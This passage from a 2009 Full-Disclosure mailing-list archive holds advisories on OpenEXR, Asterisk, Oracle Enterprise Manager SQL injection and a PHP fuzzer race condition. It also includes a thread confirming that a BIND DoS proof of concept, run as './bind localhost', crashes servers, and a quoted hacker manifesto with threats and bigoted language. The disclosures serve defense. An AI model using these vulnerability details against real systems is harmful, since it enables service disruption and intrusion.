b172bfc0cf673525901c73109109293c mes5/x86_64/OpenEXR-1.6.1-3.1mdvmes5.x86_64.rpm ed0d0f51d77ced65473c17f947357dc1 mes5/SRPMS/OpenEXR-1.6.1-3.1mdvmes5.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKdeRhmqjQ0CJFipgRAhohAJ9r72mQLfb2rVYTEVKjaXklfU/NywCg0d7i 6tYxHeVH+/9YCIkUScOGnOc= =sY+X -----END PGP SIGNATURE----- From security at mandriva.com Sun Aug 2 23:31:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Mon, 03 Aug 2009 00:31:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:191 ] OpenEXR Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:191 http://www.mandriva.com/security/ _______________________________________________________________________ Package : OpenEXR Date : August 2, 2009 Affected: Corporate 4.0 _______________________________________________________________________ Problem Description: Multiple vulnerabilities has been found and corrected in OpenEXR: Multiple integer overflows in OpenEXR 1.2.2 and 1.6.1 allow context-dependent attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unspecified vectors that trigger heap-based buffer overflows, related to (1) the Imf::PreviewImage::PreviewImage function and (2) compressor constructors. NOTE: some of these details are obtained from third party information (CVE-2009-1720). The decompression implementation in the Imf::hufUncompress function in OpenEXR 1.2.2 and 1.6.1 allows context-dependent attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger a free of an uninitialized pointer (CVE-2009-1721). Buffer overflow in the compression implementation in OpenEXR 1.2.2 allows context-dependent attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unspecified vectors (CVE-2009-1722). This update provides fixes for these vulnerabilities. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1720 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1721 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1722 _______________________________________________________________________ Updated Packages: Corporate 4.0: 946b1c4d8a4c50aa6130e76c3d6fff06 corporate/4.0/i586/libOpenEXR2-1.2.2-3.1.20060mlcs4.i586.rpm 7f596e5869c12f454dcbd0341e445624 corporate/4.0/i586/libOpenEXR2-devel-1.2.2-3.1.20060mlcs4.i586.rpm c3932240bc5e30f064a5befba72956f1 corporate/4.0/i586/OpenEXR-1.2.2-3.1.20060mlcs4.i586.rpm 13ad97aee38294f44fb49312b13fd2ad corporate/4.0/SRPMS/OpenEXR-1.2.2-3.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 2443eed8b8599126300fb61f17b14c8c corporate/4.0/x86_64/lib64OpenEXR2-1.2.2-3.1.20060mlcs4.x86_64.rpm 8c57f91c078821221feaf1bb390d9925 corporate/4.0/x86_64/lib64OpenEXR2-devel-1.2.2-3.1.20060mlcs4.x86_64.rpm d8264dce1156e9c60f58f6765d38d317 corporate/4.0/x86_64/OpenEXR-1.2.2-3.1.20060mlcs4.x86_64.rpm 13ad97aee38294f44fb49312b13fd2ad corporate/4.0/SRPMS/OpenEXR-1.2.2-3.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKdekCmqjQ0CJFipgRAnR/AJ9JRgFOpm77MjCixGOPCSwe5V2dkACg8QP3 lEsqC//wSoVIxwRgEnyK4xE= =lvuP -----END PGP SIGNATURE----- From ghosts at gmail.com Mon Aug 3 01:28:48 2009 From: ghosts at gmail.com (ghost) Date: Sun, 2 Aug 2009 17:28:48 -0700 Subject: [Full-disclosure] Just Asking In-Reply-To: References: <4A74C9B6.40309@gmail.com> Message-ID: <6f4bb0b50908021728k41a68f07w19bef9bd6e84a287@mail.gmail.com> and yet still, none of what you posted has anything to do with Dan commencing in questionable activities. On Sun, Aug 2, 2009 at 1:30 PM, Paul Schmehl wrote: > Nothing is more impressive than some anonymous twit attacking someone who > does their research under their own name with stolen information they > should not have to begin with and then selectively publishing only that > which bolsters their supposed case. > > --On August 2, 2009 12:03:18 AM +0100 Ew0k > wrote: > >> A friend of mine observed something that I believe should be put on the >> table. >> While reading the e-mails sent back and forth by Dan Kaminsky, illegally >> published on zf05 one of the e-mails caught his eye: >> >> """ >> >> Dan, >> >> >> This is another of our clients and you do not have the permission of the >> client to perform this kind of scanning. >> You have triggered over 22,000 events for us in this range alone as well >> as caused a few other minor aggravations. >> While you may believe you are a researcher and doing good, performing >> your unauthorized testing on live production platforms is a reportable >> offense. >> I am going to kindly suggest you seek permission from various targets >> before you continue your "research". >> Please note I am under contractual obligations to report your >> activities, we have recorded your "scans" on over 26 devices globally >> and none of our clients have given you permission to perform these >> "tests" >> >> """ >> >> Now, according to this e-mail should Dan's CISSP certification be >> revised? > > > > Paul Schmehl, If it isn't already > obvious, my opinions are my own > and not those of my employer. > ****************************************** > WARNING: Check the headers before replying > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From pschmehl_lists at tx.rr.com Mon Aug 3 02:00:36 2009 From: pschmehl_lists at tx.rr.com (Paul Schmehl) Date: Sun, 02 Aug 2009 20:00:36 -0500 Subject: [Full-disclosure] Just Asking In-Reply-To: <6f4bb0b50908021728k41a68f07w19bef9bd6e84a287@mail.gmail.com> References: <4A74C9B6.40309@gmail.com> <6f4bb0b50908021728k41a68f07w19bef9bd6e84a287@mail.gmail.com> Message-ID: <13643CB20F3584E3D79FE91D@Macintosh-2.local> Reading comprehension problems? From what he or she posted we have no idea if the email he or she posted actually exists or not, whether it was a misunderstanding and Dan had actually gotten permission but it didn't trickle down to the individual purported to have sent that message to Dan, etc.,etc. IOW, it's a pile of hogwash posted without attribution making a claim that cannot be investigated, or, as I put it, "selectively publishing on that.....". Or to put it another way, typical internet bullshit. So now you are defending a anonymous accuser posting unattributable emails making unsubstantiated claims that cannot even be investigated and claiming that I've done nothing to refute them. The typical "so when did you stop beating your wife" "reasoning". Excuse me if I'm not impressed. --On August 2, 2009 7:28:48 PM -0500 ghost wrote: > > and yet still, none of what you posted has anything to do with Dan > commencing in questionable activities. > > > > On Sun, Aug 2, 2009 at 1:30 PM, Paul Schmehl > wrote: >> Nothing is more impressive than some anonymous twit attacking someone >> who does their research under their own name with stolen information >> they should not have to begin with and then selectively publishing only >> that which bolsters their supposed case. >> >> --On August 2, 2009 12:03:18 AM +0100 Ew0k >> wrote: >> >>> A friend of mine observed something that I believe should be put on the >>> table. >>> While reading the e-mails sent back and forth by Dan Kaminsky, >>> illegally published on zf05 one of the e-mails caught his eye: >>> >>> """ >>> >>> Dan, >>> >>> >>> This is another of our clients and you do not have the permission of >>> the client to perform this kind of scanning. >>> You have triggered over 22,000 events for us in this range alone as >>> well as caused a few other minor aggravations. >>> While you may believe you are a researcher and doing good, performing >>> your unauthorized testing on live production platforms is a reportable >>> offense. >>> I am going to kindly suggest you seek permission from various targets >>> before you continue your "research". >>> Please note I am under contractual obligations to report your >>> activities, we have recorded your "scans" on over 26 devices globally >>> and none of our clients have given you permission to perform these >>> "tests" >>> >>> """ >>> >>> Now, according to this e-mail should Dan's CISSP certification be >>> revised? >> >> >> >> Paul Schmehl, If it isn't already >> obvious, my opinions are my own >> and not those of my employer. >> ****************************************** >> WARNING: Check the headers before replying >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ Paul Schmehl, If it isn't already obvious, my opinions are my own and not those of my employer. ****************************************** WARNING: Check the headers before replying From tomb at byrneit.net Mon Aug 3 02:18:37 2009 From: tomb at byrneit.net (Tomas L. Byrnes) Date: Sun, 2 Aug 2009 18:18:37 -0700 Subject: [Full-disclosure] Just Asking In-Reply-To: <6f4bb0b50908021728k41a68f07w19bef9bd6e84a287@mail.gmail.com> References: <4A74C9B6.40309@gmail.com> <6f4bb0b50908021728k41a68f07w19bef9bd6e84a287@mail.gmail.com> Message-ID: <70D072392E56884193E3D2DE09C097A91F4424@pascal.zaphodb.org> >-----Original Message----- >From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure- >bounces at lists.grok.org.uk] On Behalf Of ghost >Sent: Sunday, August 02, 2009 5:29 PM >To: Paul Schmehl >Cc: full-disclosure at lists.grok.org.uk >Subject: Re: [Full-disclosure] Just Asking > >and yet still, none of what you posted has anything to do with Dan >commencing in questionable activities. > > [TLB:] And none of what you posted represents the least actionable proof that he did. A text file, posted by self-professed Cyber-Criminals, is not evidence of any sort that can be acted on to deprive someone of professional certification. At least, not in those parts of the world where we have the rule of law, standards of evidence, and other such things that make commerce work. The supposed victim of Dan's unauthorized network analysis would have to complain to ISC2, with proper evidence, and proper chain of custody and non-repudiation of said evidence, before any action could even begin. Instead of advocating the rescission Dan's CISSP, you should study the material and go get your own. From security at asterisk.org Mon Aug 3 05:30:14 2009 From: security at asterisk.org (Asterisk Security Team) Date: Sun, 02 Aug 2009 23:30:14 -0500 Subject: [Full-disclosure] AST-2009-004: Remote Crash Vulnerability in RTP stack Message-ID: Asterisk Project Security Advisory - AST-2009-004 +------------------------------------------------------------------------+ | Product | Asterisk | |----------------------+-------------------------------------------------| | Summary | Remote Crash Vulnerability in RTP stack | |----------------------+-------------------------------------------------| | Nature of Advisory | Exploitable Crash | |----------------------+-------------------------------------------------| | Susceptibility | Remote unauthenticated sessions | |----------------------+-------------------------------------------------| | Severity | Critical | |----------------------+-------------------------------------------------| | Exploits Known | No | |----------------------+-------------------------------------------------| | Reported On | July 27, 2009 | |----------------------+-------------------------------------------------| | Reported By | Marcus Hunger | |----------------------+-------------------------------------------------| | Posted On | August 2, 2009 | |----------------------+-------------------------------------------------| | Last Updated On | August 2, 2009 | |----------------------+-------------------------------------------------| | Advisory Contact | Mark Michelson | |----------------------+-------------------------------------------------| | CVE Name | | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Description | An attacker can cause Asterisk to crash remotely by | | | sending malformed RTP text frames. While the attacker | | | can cause Asterisk to crash, he cannot execute arbitrary | | | remote code with this exploit. | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Resolution | Users should upgrade to a version listed in the | | | "Corrected In" section below. | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Affected Versions | |------------------------------------------------------------------------| | Product | Release Series | | |-------------------------------+----------------+-----------------------| | Asterisk Open Source | 1.2.x | Unaffected | |-------------------------------+----------------+-----------------------| | Asterisk Open Source | 1.4.x | Unaffected | |-------------------------------+----------------+-----------------------| | Asterisk Open Source | 1.6.x | All 1.6.1 versions | |-------------------------------+----------------+-----------------------| | Asterisk Addons | 1.2.x | Unaffected | |-------------------------------+----------------+-----------------------| | Asterisk Addons | 1.4.x | Unaffected | |-------------------------------+----------------+-----------------------| | Asterisk Addons | 1.6.x | Unaffected | |-------------------------------+----------------+-----------------------| | Asterisk Business Edition | A.x.x | Unaffected | |-------------------------------+----------------+-----------------------| | Asterisk Business Edition | B.x.x | Unaffected | |-------------------------------+----------------+-----------------------| | Asterisk Business Edition | C.x.x | Unaffected | |-------------------------------+----------------+-----------------------| | AsteriskNOW | 1.5 | Unaffected | |-------------------------------+----------------+-----------------------| | s800i (Asterisk Appliance) | 1.2.x | Unaffected | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Corrected In | |------------------------------------------------------------------------| | Product | Release | |---------------------------------------------+--------------------------| | Open Source Asterisk 1.6.1 | 1.6.1.2 | |---------------------------------------------+--------------------------| |---------------------------------------------+--------------------------| +------------------------------------------------------------------------+ +----------------------------------------------------------------------------+ | Patches | |----------------------------------------------------------------------------| | SVN URL |Version| |--------------------------------------------------------------------+-------| |http://downloads.digium.com/pub/security/AST-2009-004-1.6.1.diff.txt| 1.6.1 | |--------------------------------------------------------------------+-------| +----------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Links | | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Asterisk Project Security Advisories are posted at | | http://www.asterisk.org/security | | | | This document may be superseded by later versions; if so, the latest | | version will be posted at | | http://downloads.digium.com/pub/security/AST-2009-004.pdf and | | http://downloads.digium.com/pub/security/AST-2009-004.html | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Revision History | |------------------------------------------------------------------------| | Date | Editor | Revisions Made | |----------------+-----------------+-------------------------------------| | 27 Jul, 2009 | Mark Michelson | Initial Draft | |----------------+-----------------+-------------------------------------| | 31 Jul, 2009 | Mark Michelson | Added sentence about how remote | | | | code cannot be executed. | |----------------+-----------------+-------------------------------------| | August 2, 2009 | Tilghman Lesher | Public release | +------------------------------------------------------------------------+ Asterisk Project Security Advisory - AST-2009-004 Copyright (c) 2009 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form. From havensr3577 at student.faytechcc.edu Mon Aug 3 08:50:33 2009 From: havensr3577 at student.faytechcc.edu (Robert H) Date: Mon, 03 Aug 2009 03:50:33 -0400 Subject: [Full-disclosure] (no subject) In-Reply-To: <20090722012738.4A82FBE407E@ws1-9.us4.outblaze.com> References: <20090722012738.4A82FBE407E@ws1-9.us4.outblaze.com> Message-ID: <4A7696C9.2050709@student.faytechcc.edu> General Disarray begin the flooding of the FD mailing list. anti sec wrote: > We, the worldwide anti-sec movement have landed yet another coup that > will strike full-disclosurizers into the very hearts and soul of their > being. > > Fellow anti-sec'ers and freedom-lovers: Rejoice, for it is time to > take revenge against the full disclosure zionist hegemony in > retaliation for the damage white hats have been committing against > the security world. Our heroic anti-sec warriors have carried out a > blessed raid against 4chanarchive.org. 4chan users are now burning > with fear, terror and panic on their /b/, /gif/, /r9k/, and /a/ boards. > > The white hat world will soon be asunder and the enemies will flee > from our holy power! > > We have repeatedly warned the security industry and the people in it. > DO NOT FUCK WITH ANTI-SEC! Statistically speaking, every white hat is > using 4chan or at least has heard of it. Thus we struck into the very > core of their existence. We have fulfilled our promise and carried out > our blessed hacking attack on 4chanarchive after our warriors exerted > strenuous efforts over a long period of time to ensure the success of > the attack. > > We continue to warn the websites of governmentsecurity and hackforums > and all full disclosure public as a whole that they will be punished > in the same way if they do not withdraw from their erroneous ways of > living and see that white hats are the scum of the earth. Those who > warn are excused. > > The list will be released at the usual places. those in the know do > realize where that is. > > ANTI-SEC FOR LIFE! From lm.net.security at gmail.com Mon Aug 3 09:19:37 2009 From: lm.net.security at gmail.com (Leandro Malaquias) Date: Mon, 03 Aug 2009 09:19:37 +0100 Subject: [Full-disclosure] Just Asking In-Reply-To: <13643CB20F3584E3D79FE91D@Macintosh-2.local> References: <4A74C9B6.40309@gmail.com> <6f4bb0b50908021728k41a68f07w19bef9bd6e84a287@mail.gmail.com> <13643CB20F3584E3D79FE91D@Macintosh-2.local> Message-ID: <4A769D99.1090606@gmail.com> Paul Schmehl wrote: > Reading comprehension problems? From what he or she posted we have no > idea if the email he or she posted actually exists or not, whether it was > a misunderstanding and Dan had actually gotten permission but it didn't > trickle down to the individual purported to have sent that message to Dan, > etc.,etc. > > IOW, it's a pile of hogwash posted without attribution making a claim that > cannot be investigated, or, as I put it, "selectively publishing on > that.....". Or to put it another way, typical internet bullshit. > > So now you are defending a anonymous accuser posting unattributable emails > making unsubstantiated claims that cannot even be investigated and > claiming that I've done nothing to refute them. The typical "so when did > you stop beating your wife" "reasoning". > > Excuse me if I'm not impressed. > > --On August 2, 2009 7:28:48 PM -0500 ghost wrote: > > >> and yet still, none of what you posted has anything to do with Dan >> commencing in questionable activities. >> >> >> >> On Sun, Aug 2, 2009 at 1:30 PM, Paul Schmehl >> wrote: >> >>> Nothing is more impressive than some anonymous twit attacking someone >>> who does their research under their own name with stolen information >>> they should not have to begin with and then selectively publishing only >>> that which bolsters their supposed case. >>> >>> --On August 2, 2009 12:03:18 AM +0100 Ew0k >>> wrote: >>> >>> >>>> A friend of mine observed something that I believe should be put on the >>>> table. >>>> While reading the e-mails sent back and forth by Dan Kaminsky, >>>> illegally published on zf05 one of the e-mails caught his eye: >>>> >>>> """ >>>> >>>> Dan, >>>> >>>> >>>> This is another of our clients and you do not have the permission of >>>> the client to perform this kind of scanning. >>>> You have triggered over 22,000 events for us in this range alone as >>>> well as caused a few other minor aggravations. >>>> While you may believe you are a researcher and doing good, performing >>>> your unauthorized testing on live production platforms is a reportable >>>> offense. >>>> I am going to kindly suggest you seek permission from various targets >>>> before you continue your "research". >>>> Please note I am under contractual obligations to report your >>>> activities, we have recorded your "scans" on over 26 devices globally >>>> and none of our clients have given you permission to perform these >>>> "tests" >>>> >>>> """ >>>> >>>> Now, according to this e-mail should Dan's CISSP certification be >>>> revised? >>>> >>> >>> Paul Schmehl, If it isn't already >>> obvious, my opinions are my own >>> and not those of my employer. >>> ****************************************** >>> WARNING: Check the headers before replying >>> >>> _______________________________________________ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> > > > > Paul Schmehl, If it isn't already > obvious, my opinions are my own > and not those of my employer. > ****************************************** > WARNING: Check the headers before replying > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > Actually it can be investigated cause the name and business information from the author is on the e-mail. I'm not questioning Dan's competence, all I'm saying is do CISSP regulations apply to all or just to UNFAMOUS professional? -- LM - If you're not part of the solutions, you're part of the problem. http://sekuritymatters.wordpress.com From sekuritymatter at gmail.com Mon Aug 3 00:14:31 2009 From: sekuritymatter at gmail.com (Ew0k) Date: Mon, 03 Aug 2009 00:14:31 +0100 Subject: [Full-disclosure] Just Asking In-Reply-To: References: <4A74C9B6.40309@gmail.com> Message-ID: <4A761DD7.8070307@gmail.com> Paul Schmehl wrote: > Nothing is more impressive than some anonymous twit attacking someone who > does their research under their own name with stolen information they > should not have to begin with and then selectively publishing only that > which bolsters their supposed case. > > --On August 2, 2009 12:03:18 AM +0100 Ew0k > wrote: > > >> A friend of mine observed something that I believe should be put on the >> table. >> While reading the e-mails sent back and forth by Dan Kaminsky, illegally >> published on zf05 one of the e-mails caught his eye: >> >> """ >> >> Dan, >> >> >> This is another of our clients and you do not have the permission of the >> client to perform this kind of scanning. >> You have triggered over 22,000 events for us in this range alone as well >> as caused a few other minor aggravations. >> While you may believe you are a researcher and doing good, performing >> your unauthorized testing on live production platforms is a reportable >> offense. >> I am going to kindly suggest you seek permission from various targets >> before you continue your "research". >> Please note I am under contractual obligations to report your >> activities, we have recorded your "scans" on over 26 devices globally >> and none of our clients have given you permission to perform these >> "tests" >> >> """ >> >> Now, according to this e-mail should Dan's CISSP certification be >> revised? >> > > > > Paul Schmehl, If it isn't already > obvious, my opinions are my own > and not those of my employer. > ****************************************** > WARNING: Check the headers before replying > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > There was no need to offend, plus you "defended you man" but didn't answer my question, so if I were you I would just shut up. -- Ew0k - Anxiety generates errors, and errors create oportunities... http://sekuritymatters.wordpress.com From dagiod44 at gmail.com Mon Aug 3 07:30:03 2009 From: dagiod44 at gmail.com (Dagio Dino) Date: Mon, 3 Aug 2009 09:30:03 +0300 Subject: [Full-disclosure] Just Asking Message-ID: <9821d6a50908022330n41ebe6b6rfea596cd39358b2a@mail.gmail.com> yeap, and then become another Dan Kaminsk... greetz to ZF0 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090803/ce5b46d4/attachment.html From tahacalypse at gmail.com Mon Aug 3 16:49:47 2009 From: tahacalypse at gmail.com (taha) Date: Mon, 3 Aug 2009 17:49:47 +0200 Subject: [Full-disclosure] THISISNOTMYEXPLOIT In-Reply-To: References: <72f8221d0907300344m4564bb61tddbc80c817dc2c50@mail.gmail.com> <72f8221d0907300424v4037fbefl84af3adca3d246c7@mail.gmail.com> <72f8221d0907310858k7b3fa498s7a494adf5d35820f@mail.gmail.com> Message-ID: <1c0c3e420908030849l6d9122edi7cee77a072d1a2b7@mail.gmail.com> On Sat, Aug 1, 2009 at 3:25 PM, yersinia wrote: > On Fri, Jul 31, 2009 at 5:58 PM, Kingcope wrote: > > Hello people, > > Yes there is a warning when the PoC is compiled. But I guess that is > > not a big issue. > > No, problem. It is only necessary to include stdlib.h because malloc > is implicitily defined (gcc complaint). Anyway, your POC work as > aspected. Thanks. In this days it is difficult to see a true exploit > in a mailing list. The fact that bug was discovered from someone else > is not important : you have rewritten in another language, so it is > only your work. > > Regards > > So about what PoC am I talking about? > > It seems that the moderator of bugtraq keeps blocking me because of fancy > > headlines maybe. The moderator of bugtraq blocked the actual exploit but > let > > the following messages slip through. The PoC is on milw0rm.com and > > full disclosure. > > Thanks for clarifying the issue with the zones, I really have not a > > 100% understanding > > of the DNS protocol therefore I took a guess on my named.conf file and > put the > > address into the PoC. > > > > Thanks for your time, > > > > Kingcope > > > > > > 2009/7/31 yersinia : > >> Repost for mailing problem. > >> On Fri, Jul 31, 2009 at 12:14 AM, yersinia > wrote: > >>> > >>> On Thu, Jul 30, 2009 at 1:24 PM, Kingcope > wrote: > >>>> > >>>> Hello again, > >>>> the default setting of 127.in-addr.arpa is a bit weird > >>>> > >>>> try > >>>> ./bind localhost > >>> > >>> Never mind. I have only a warning from gcc because it was necessary to > include stdlib.h for malloc. > >>> > >>> But, the important thing is that it works as aspected. > >>> > >>> Regards > >>>> > >>>> lewls > >>>> > >>>> XD > >>>> > >>>> kcope > >>>> > Hello all, By reading the US-CERT vulnerability issue (CVE-2009-0696) I found this : "The vulnerability affects all servers that are masters for one or more zones and is not limited to those that are configured to allow dynamic updates ". I have some Infoblox master DNS servers with not-allowed dynamic updates, so I'm wondering if they are vulnerable to this attack and if somebody test this PoC on a DNS server which not allow dynamic updates? What is the comportement in this case? Thanks for the help, -- taha -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090803/f3e6ea34/attachment.html From yersinia.spiros at gmail.com Mon Aug 3 17:04:38 2009 From: yersinia.spiros at gmail.com (yersinia) Date: Mon, 3 Aug 2009 18:04:38 +0200 Subject: [Full-disclosure] THISISNOTMYEXPLOIT In-Reply-To: <1c0c3e420908030849l6d9122edi7cee77a072d1a2b7@mail.gmail.com> References: <72f8221d0907300344m4564bb61tddbc80c817dc2c50@mail.gmail.com> <72f8221d0907300424v4037fbefl84af3adca3d246c7@mail.gmail.com> <72f8221d0907310858k7b3fa498s7a494adf5d35820f@mail.gmail.com> <1c0c3e420908030849l6d9122edi7cee77a072d1a2b7@mail.gmail.com> Message-ID: On Mon, Aug 3, 2009 at 5:49 PM, taha wrote: > > > On Sat, Aug 1, 2009 at 3:25 PM, yersinia wrote: >> >> On Fri, Jul 31, 2009 at 5:58 PM, Kingcope wrote: >> > Hello people, >> > Yes there is a warning when the PoC is compiled. But I guess that is >> > not a big issue. >> >> No, problem. It is only necessary to include stdlib.h because malloc >> is implicitily defined (gcc complaint). Anyway, ?your POC work as >> aspected. Thanks. In this days it is difficult to see a true exploit >> in a mailing list. The fact that bug was discovered from someone else >> is not important : you have rewritten in another language, so it is >> only your work. >> >> Regards >> > So about what PoC am I talking about? >> > It seems that the moderator of bugtraq keeps blocking me because of >> > fancy >> > headlines maybe. The moderator of bugtraq blocked the actual exploit but >> > let >> > the following messages slip through. The PoC is on milw0rm.com and >> > full disclosure. >> > Thanks for clarifying the issue with the zones, I really have not a >> > 100% understanding >> > of the DNS protocol therefore I took a guess on my named.conf file and >> > put the >> > address into the PoC. >> > >> > Thanks for your time, >> > >> > Kingcope >> > >> > >> > 2009/7/31 yersinia : >> >> Repost for mailing problem. >> >> On Fri, Jul 31, 2009 at 12:14 AM, yersinia >> >> wrote: >> >>> >> >>> On Thu, Jul 30, 2009 at 1:24 PM, Kingcope >> >>> wrote: >> >>>> >> >>>> Hello again, >> >>>> the default setting of 127.in-addr.arpa is a bit weird >> >>>> >> >>>> try >> >>>> ./bind localhost >> >>> >> >>> Never mind. I have only a warning from gcc because it was necessary to >> >>> include stdlib.h for malloc. >> >>> >> >>> But, the important thing is that it works as aspected. >> >>> >> >>> Regards >> >>>> >> >>>> lewls >> >>>> >> >>>> XD >> >>>> >> >>>> kcope >> >>>> > > Hello all, > By reading the US-CERT vulnerability issue (CVE-2009-0696) I found this : > "The vulnerability affects all servers that are masters for one or more > zones and is not limited to those that are configured to allow dynamic > updates ". I have some Infoblox master DNS servers with not-allowed dynamic > updates, so I'm wondering if they are vulnerable to this attack and if > somebody test this PoC on a DNS server which not allow dynamic updates? What > is the comportement in this case? Crash. From elliot_mb at hushmail.com Mon Aug 3 21:03:13 2009 From: elliot_mb at hushmail.com (elliot_mb at hushmail.com) Date: Mon, 03 Aug 2009 16:03:13 -0400 Subject: [Full-disclosure] PHP Fuzzer Framework Insecure File Creation/Execution Vulnerability Message-ID: <20090803200313.96A66B8044@smtp.hushmail.com> PHP Fuzzer Framework Insecure File Creation/Execution Vulnerability I. BACKGROUND PFF is a popular fuzzing suite developed by a team of highly skilled developers at a classified government funded information security research center. http://www.setec.org/~calcite/code/pff/ II. DESCRIPTION Local exploitation of an insecure file creation method allows an attacker to execute arbritrary code with the privileges of the user running the affected application. III. ANALYSIS PFF uses a default location for output files before execution by the php intepreter. This location can be owned by another user. An attacker can then use the time between creation of the output file and execution of the file by the php binary to replace the file with a one containing the attacker's payload. IV. DETECTION All versions are affected. V. WORKAROUND Use a location not writable by another user for storage of PFF output files. VI. VENDOR RESPONSE Vendor was uninterested in fixing the issue. VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has not yet assigned an identifier to this issue. VIII. DISCLOSURE TIMELINE 07/30/2009 10:01PM EST - Initial Contact 07/30/2009 10:05PM EST - Initial Vendor Reply 07/30/2009 10:06PM EST - Vendor expressed lack of interest in fixing the issue. IX. CREDIT This vulnerability was discovered by abad1dea, Melissa Elliott Email: Elliott_mb at students.lynchburg.edu melissa at netric.org Address: 408 Homestead Drive Forest, VA 24551 Box 2073 Lynchburg Edu Phone: (434) 610-3058 544-8967 Web: http://www.0xabad1dea.net IRC: irc.smashthestack.org/#social/esper --- Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ -------------- next part -------------- A non-text attachment was scrubbed... Name: cheddabay.c Type: text/x-c Size: 1530 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090803/f998fc44/attachment.bin From shatter at appsecinc.com Tue Aug 4 00:31:16 2009 From: shatter at appsecinc.com (Shatter) Date: Mon, 3 Aug 2009 19:31:16 -0400 Subject: [Full-disclosure] Team SHATTER Security Advisory: Multiple SQL Injection vulnerabilities in Oracle Enterprise Manager Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Team SHATTER Security Advisory Multiple SQL Injection vulnerabilities in Oracle Enterprise Manager July 22, 2009 Risk Level: High Affected versions: Oracle Enterprise Manager Database Control 11 (11.1.0.6, 11.1.0.7) and Oracle Enterprise Manager 10g Grid Control 10.2.0.4 (and previous patchsets) Remote exploitable: Yes (Authentication is needed) Credits: This vulnerability was discovered and researched by Esteban Mart?nez Fay? of Application Security Inc. Details: SQL Injection works by attempting to modify the parameters passed to an application to change the SQL statements that are passed to a database. SQL injection can be used to insert additional SQL statements to be executed. The 'Type', 'snapshot' and 'table' parameters used in web page /em/console/ecm/history/configHistory and 'fConfigGuid' parameter used in /em/console/ecm/config/compare/compareWizSecondConfig are vulnerable to SQL Injection attacks. These web pages are part of Oracle Enterprise Manager web application. It may be possible for a malicious user to execute a function with the elevated privileges of the SYSMAN database user in the repository database. This user has the DBA role granted. Impact: This vulnerability allow a Oracle Enterprise Manager user with VIEW (or more) privileges to execute a function call with the elevated privileges of the SYSMAN database user. Vendor Status: Vendor was contacted and a patch was released. Workaround: There is no workaround for this issue. Fix: Apply Oracle Critical Patch Update July 2009 available at Oracle Metalink. CVE: CVE-2009-1966, CVE-2009-1967 Links: Application Security, Inc advisory: http://www.appsecinc.com/resources/alerts/oracle/2009-04.shtml http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2009.html Timeline: Vendor Notification - 7/11/2008 Vendor Response - 7/14/2008 Fix - 7/14/2009 Public Disclosure - 7/22/2009 Application Security, Inc's database security solutions have helped over 1,600 organizations secure their databases from all internal and external threats while also ensuring that those organizations meet or exceed regulatory compliance and audit requirements. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in 